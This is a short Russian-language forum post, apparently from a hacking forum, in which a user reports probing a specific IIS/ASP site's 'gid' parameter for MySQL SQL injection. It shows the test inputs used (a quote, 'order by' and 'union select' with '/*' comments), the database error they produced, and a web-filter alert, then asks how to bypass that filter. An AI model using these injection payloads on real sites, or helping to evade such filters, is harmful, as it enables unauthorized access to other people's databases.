13.06.2010, 00:18
|
|
Новичок
Регистрация: 17.04.2010
Сообщений: 15
Провел на форуме:
48171
Репутация:
3
|
|
подскажите, пожалуйста.
на сервере IIS, и, как я понял, ODBC (вообщем, там MySQL).
myguild.asp?gid=2779-1 - не проходит
myguild.asp?gid=2779' - ошибка:
Код:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[MySQL][ODBC 3.51 Driver][mysqld-5.0.24a]You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''' at line 1
/myguild/myguild_common.asp, line 7
myguild.asp?gid=2779+order+by+1/* - проходит
myguild.asp?gid=2779+order+by+1-- - не проходит, т.е. -- фильтрует, а /* нет.
Но когда я делаю такое: myguild.asp?gid=2779+union+select+1/* , сервер выдает алерт:
Код:
Alert
Your request triggered an alert! If you feel that you have received this page in error, please contact the administrator of this web site.
что можно сделать? |
|
|